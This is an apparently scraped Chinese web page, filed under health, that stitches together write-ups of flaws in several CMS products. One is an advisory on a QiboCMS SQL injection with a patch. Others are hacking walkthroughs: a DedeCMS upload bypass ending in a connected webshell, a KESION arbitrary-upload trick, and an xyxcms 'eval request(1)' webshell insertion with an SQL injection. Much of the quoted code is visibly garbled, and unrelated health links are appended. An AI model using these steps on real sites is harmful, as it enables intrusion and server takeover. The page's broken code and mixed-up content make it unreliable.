热搜
您的位置:首页 >> 健康

齐博cms漏洞齐博CMS曝SQL注入漏洞

2019年05月15日 栏目:健康

1 : 齐博CMS曝SQL注入漏洞 360提示用户尽快打补丁近日,360站安全检测平台发现齐博CMSV7(原PHP168v系列)建站

1 : 齐博CMS曝SQL注入漏洞 360提示用户尽快打补丁

近日,360站安全检测平台发现齐博CMSV7(原PHP168v系列)建站系统存在SQL注入漏洞(0day),黑客可利用此漏洞入侵站服务器,盗取站数据乃至完全控制服务器。对此,360已于第1时间将漏洞信息通报厂商,并群发告警邮件提示旗下用户尽快下载补丁,360站卫士也同时更新了防护规则。

360站安全检测平台服务址:

齐博CMS建站系统是使用PHP语言开发的建站系统,因开源和可2次开放等特点为许多站长青睐。目前,齐博建站系统分为整站系统、B2B电子商务系统和分类信息系统等多个版本。360此次发现的SQL注入漏洞存在于的齐博CMSV7整站系统中,所有使用此版本系统的站都面临可能致命的安全风险。

据360安全工程师分析,此次出现的SQL注入漏洞存在于/do/s_p文件中的$queryString变量中。黑客可利$queryString变量直接通过外部post传入,并用Chinese类进行GB2312转换带入SQL语句,终究导致可绕过magic_quotes_gpc=On的限制闭合单引号,产生SQL注入漏洞。

图1:黑客可通过$queryString变量实行SQL注入

经过对齐博CMSV7官方DEMO站点进行测试发现,攻击者可通过构造SQL语句查询站的MySQL数据库版本,进行有针对性的攻击,终究拖库盗取站数据,或植入后门控制服务器。

图2:CMSV7官方的DEMO站点测试结果

图3:构造SQL语句查询站的MySQL数据库版本

由于该漏洞影响广泛,360站安全工程师强烈建议用户立即打补丁,或依照360提供的解决方案手动修复这1高危漏洞,避免SQL注入攻击。同时推荐用户使用360站卫士,保护站免遭各类络攻击。

齐博官方修复补钉下载地址:

360提供的手动解决方案:

打开/do/s_p文件,查找以下代码:

if(strlen($queryString)0)

在上面加入以下1行代码:

$queryString=addslashes($queryString);

2 : 织梦cms v6.7上传漏洞

下面是织梦dedecms6.7上传漏洞

目标站点爬出来全是html

御剑扫描1下

打开1看是织梦的,可以注册。

前些天看到过大牛发表的织梦上传漏洞

file:

newname:

提交

1,必须登陆用户。

2,将待上传PHP文件扩大名改成zip|gz|rar|iso|doc|xsl|ppt|wps其中之1。

3,newname为上传后的新文件名,扩大名使用大写绕过,如Php。

因而注册用户,构造html文件,将文件格式改成rar,进行上传1句话

结果并没有那么简单,

怎样回事呢?我尝试了改其他格式的文件名都没法上传。

由于上传以后文件是直接在站点根目录,所以我想到了解析漏洞php;.jpg

页面出现空白

用菜刀连接1下,

成功进入。谢谢观看

原文:情 blog

3 : 科讯KESION CMS版任意文件上传WEBSHELL漏洞

会员上传文件漏洞,可以上传任意后缀 user/p文件漏洞

If rm("NoReName")="1" Then '不更名

Dim PhysicalPath,FsoObj:Set FsoObj = itialObject(tting(99))

PhysicalPath = pPath(replace(TempFileStr,"|",""))

TempFileStr= mid(TempFileStr,1, InStrRev(TempFileStr, "/")) FileTitles

If leExists(PhysicalPath)=true Then

veFile PhysicalPath,pPath(TempFileStr)

End If

End If

会员注册登录后,手工构造1NoReName参数便可上传自定义文件名

绕过危险代码可以用!--#include file=--类型来包括图片便可,可以用远程下载或修改/user/User_p?action=BlogEdit里的LOGO文件来上传代码文件(不检查危险代码的哦)

修复方案:

过滤。。

4 : xyxcms v1.3 小游戏CMS 漏洞说明

国内专业的ASP站内容管理系统-小游戏管理系统,他将是您轻松建站的利器。小游戏CMS系统对站点管理和创造都有好处,不管是CMS系统的易用性和功能的完善性,都处于优势!站的、发布、管理人员可轻松便捷的通太小游戏CMS系统来提交修改、审批、发布内容。

[xyxcms]

版本信息:V1.3 正式版

软件大小:1.66M

更新时间:2010年8月6日

官方:

漏洞文件: p

程序虽小。 总会遇到!

鄙视挂马者。!

学习之用。 后果自负。

后台拿webshell:

admin/admin_p

站地址: 插入 :eval request(1):'

inc/p 1句话后门

act=request("action")

id=trim(request("id"))

................'省略

if act="getding" then call getding

....................'省略

sub getding

id=request("id") '没过滤

set rs=eateobject("cordset")

sql="select ding from flash where id="id

en sql,conn,1,1

if not f then

if isnull(rs(0)) then

ite(0)

else

ite(rs(0))

end if

else

ite(0)

end if

ose

set rs=nothing

end sub

女人痛经吃什么中药好
月经不调一直不稳定
经期延长胸胀痛怎么办